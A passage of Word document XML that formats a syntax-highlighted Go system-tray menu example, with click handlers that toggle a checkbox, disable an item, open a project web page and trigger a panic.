          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChecked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Checked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChecked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Uncheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChecked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Unchecked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChecked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChecked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Checked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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t>}</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>该菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Disabled"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>取消勾选</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mUrl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>使用内置浏览器打开某网页，没什么用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"https://www.getlantern.org"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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lastRenderedPageBreak/>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuBottom2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"panic button pressed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
